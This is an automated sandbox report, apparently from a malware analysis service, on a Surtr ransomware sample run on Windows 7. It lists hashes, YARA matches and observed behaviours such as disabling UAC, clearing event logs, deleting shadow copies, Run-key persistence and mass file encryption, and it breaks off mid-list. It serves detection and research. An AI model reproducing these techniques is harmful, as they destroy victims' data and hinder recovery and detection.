Analysis
-
max time kernel
840s -
max time network
841s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31-12-2024 23:46
Static task
static1
Behavioral task
behavioral1
Sample
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
Resource
win10v2004-20241007-en
General
-
Target
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
-
Size
320KB
-
MD5
e6fc190168519d6a6c4f1519e9450f0f
-
SHA1
af2080ddf1064fb80c7b9af942aaabf264441098
-
SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
-
SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
SSDEEP
6144:Q4K8rYBWqjbqL7busNWGl3GDmm+miR9zrmkdAZ:Q46QKbQJNDl3cmgiRlK
Malware Config
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
surtr
Signatures
-
Detects Surtr Payload 47 IoCs
resource yara_rule behavioral1/memory/2744-9-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-18-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-37-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-36-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-35-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-30-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-28-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-34-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-33-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-27-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-22-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-29-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-25-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-23-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-21-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-17-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-16-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-12-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-15-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-10-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-40-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-41-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-49-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-48-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-51-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-50-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-59-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-60-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-52-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-58-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-54-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-57-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-56-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-55-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-53-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-61-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-62-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-63-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-47-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-46-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-45-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-39-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-44-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-43-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-42-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-114-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr behavioral1/memory/2744-869-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr -
Surtr
Ransomware family first seen in late 2021.
-
Surtr family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Clears Windows event logs 1 TTPs 64 IoCs
pid Process 2488 wevtutil.exe 2100 Process not Found 3688 wevtutil.exe 3420 wevtutil.exe 3532 Process not Found 2264 wevtutil.exe 2456 Process not Found 2604 Process not Found 2852 Process not Found 2684 Process not Found 2148 wevtutil.exe 5080 wevtutil.exe 4896 wevtutil.exe 576 wevtutil.exe 1228 wevtutil.exe 1308 wevtutil.exe 3824 Process not Found 3044 wevtutil.exe 1536 wevtutil.exe 3888 wevtutil.exe 324 Process not Found 3572 Process not Found 3520 Process not Found 3968 wevtutil.exe 1040 wevtutil.exe 5060 wevtutil.exe 2912 Process not Found 1400 wevtutil.exe 2428 wevtutil.exe 4316 Process not Found 2776 Process not Found 2236 Process not Found 1464 Process not Found 1760 wevtutil.exe 3708 Process not Found 2568 Process not Found 2468 wevtutil.exe 4092 Process not Found 1984 Process not Found 3412 Process not Found 3148 wevtutil.exe 3860 Process not Found 4188 Process not Found 3480 Process not Found 2636 wevtutil.exe 4300 wevtutil.exe 1352 wevtutil.exe 2408 Process not Found 3780 wevtutil.exe 3408 wevtutil.exe 5116 wevtutil.exe 1996 Process not Found 4272 Process not Found 3988 wevtutil.exe 4140 wevtutil.exe 4068 Process not Found 3056 Process not Found 1596 Process not Found 1548 wevtutil.exe 3116 wevtutil.exe 3488 wevtutil.exe 4168 wevtutil.exe 3128 wevtutil.exe 4660 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2144 bcdedit.exe 1944 bcdedit.exe -
Renames multiple (9422) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 7 IoCs
flow pid Process 5 4524 Process not Found 6 4524 Process not Found 10 4524 Process not Found 11 4524 Process not Found 12 4524 Process not Found 14 4524 Process not Found 16 4524 Process not Found -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\H: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\N: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\U: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\W: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\B: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\S: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\O: vssadmin.exe File opened (read-only) \??\E: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\K: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\O: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\Z: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\R: vssadmin.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\L: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\M: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\P: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\S: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\Q: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\T: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\V: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\X: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\B: vssadmin.exe File opened (read-only) \??\G: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\I: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\J: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\P: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\R: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\Y: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\A: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2604 Process not Found -
Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
pid Process 4164 Process not Found 2736 Process not Found 388 Process not Found 2084 Process not Found 1612 Process not Found 4100 Process not Found -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg" 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2656 set thread context of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 -
resource yara_rule behavioral1/memory/2744-5-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-6-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-1-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-8-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-9-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-7-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-3-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-18-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-37-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-36-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-35-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-30-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-28-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-34-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-33-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-27-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-22-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-29-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-25-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-23-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-21-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-17-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-16-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-12-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-15-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-10-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-40-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-41-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-49-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-48-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-51-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-50-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-59-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-60-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-52-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-58-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-54-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-57-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-56-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-55-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-53-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-61-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-62-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-63-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-47-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-46-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-45-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-39-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-44-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-43-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-42-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-114-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/2744-869-0x0000000140000000-0x0000000140136000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\settings.js.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TITLE.XSL.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCARD.XML.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\System.IO.Log.Resources.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseover.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105490.WMF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.XML.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Common Files\System\ado\msadox.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\vlc.mo.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\VSTAProject.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Data.Entity.Design.Resources.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\css\RSSFeeds.css.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00034_.WMF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02465_.WMF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\THROAT.WAV.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.lnk.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\css\settings.css.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00998_.WMF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Data.Entity.Resources.dll.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files 